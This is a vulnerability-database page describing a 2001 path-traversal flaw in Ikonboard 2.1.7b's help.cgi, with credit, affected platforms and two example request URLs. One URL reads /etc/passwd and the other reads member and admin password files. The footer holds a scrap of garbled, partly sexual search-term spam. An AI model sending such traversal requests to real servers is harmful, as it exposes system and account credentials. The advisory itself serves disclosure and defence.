about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Ikonboard Remote File Disclosure Vulnerability


Title Ikonboard Remote File Disclosure Vulnerability
Published 2001-03-11-12:00AM
Updated 2001-03-15-12:41PM
Class Input Validation Error
CVE   CAN-2001-0360
Remote  Yes
Local  No
Credit  Reported to bugtraq by "Martin J. Muench" <muench@gmc-online.de> on March 11, 2001.
Vulnerable  Ikonboard.com ikonboard 2.1.7 b
BSDI BSD/OS 4.0.1
Conectiva Linux 6.0
Debian Linux 2.2
Digital (Compaq) TRU64/DIGITAL UNIX 5.0
FreeBSD FreeBSD 4.2
HP HPUX 11.11
IBM AIX 4.3.3
MandrakeSoft Linux Mandrake 7.2
Microsoft Windows 2000 Professional
Microsoft Windows NT 4.0
NetBSD NetBSD 1.4.3
OpenBSD OpenBSD 2.8
RedHat Linux 7.0
S.u.S.E. Linux 7.0
SCO eServer 2.3
Sun Solaris 8.0
Not Vulnerable  
Code   Example:

http://www.example.com/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00

will disclose /etc/passwd, if readable by the webserver.

http://www.example.com/cgi-bin/ikonboard/help.cgi?helpon=../members/[member].cgi%00

discloses the ikonboard account password for [member], including admin acounts.
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 20:14:25 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Carolin pi Crack Data AnimalsSex Laxpionsex www.search 81YEARSEX maxcpm.inf video porn http://dig i...e($ddd funy video IIS Cross =...rem/ol Super sexy Gambar art video porn del2sport javascript frontpage www tamil Www+Galeri www.tamils http//www. 18qt Hot&am Http/secur gatea Apache/2.2 zara vuln/explo cialis fre news for c LSASS Free saxy Free saxy phrom reset meena nude naked phot Www.love c pinkworld. Minta gamb www.vkonta login pass php-nuke 2 /search/ex Fee.veteo. php3 meena nude lost